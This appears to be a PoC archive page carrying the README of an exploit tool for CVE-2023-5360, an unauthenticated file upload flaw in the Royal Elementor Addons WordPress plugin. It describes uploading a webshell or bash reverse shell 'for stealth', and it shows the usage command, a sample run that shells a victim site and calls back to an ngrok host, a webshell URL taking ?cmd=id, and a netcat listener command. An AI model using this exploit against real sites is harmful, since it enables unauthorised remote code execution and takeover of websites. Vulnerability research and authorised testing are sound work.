CVE-2023-5360 PoC — Royal Elementor Addons and Templates < 1.3.79 - Unauthenticated Arbitrary File Upload

Source

Associated Vulnerability

Description

Royal Elementor Addons - Unauthenticated Remote Code Execution

Readme

# CVE-2023-5360 Elementor File Upload Exploit

The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.

```
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

by X3RX3S
```

## Description

This is a proof-of-concept exploit for **CVE-2023-5360**, a file upload vulnerability in Elementor Pro for WordPress.
It allows an unauthenticated attacker to upload arbitrary PHP files and gain remote code execution.

## Features

- Grab Elementor nonce automatically
- Upload a simple webshell or reverse shell
- Unique filenames for stealth
- Optional Netcat listener helper
- Sexy AF

## Usage

```bash
python3 CVE-2023-5360.py <https://victim.site/>
```

Example:

```bash
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣
```

Payload options:
1. Simple command webshell (`?cmd=id`  as in: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
2. Reverse shell (Bash)

## Dependencies

- Python 3.x
- `requests` module

Install dependencies:

```bash
pip install requests
```

## Example listener

```bash
nc -lvnp 1337
```

## Disclaimer

This exploit is for educational and authorized security testing only.
You are responsible for how you use it.
Test only on systems you own or have permission to test.

## Credits

**Author:** X3RX3S
CVE-2023-5360

File Snapshot

 [4.0K]  /data/pocs/2b04cbce1d12a3193ad7688b123c4fa1665e91b2
├── [4.8K]  CVE-2023-5360.py
└── [3.1K]  README.md

0 directories, 2 files

Remarks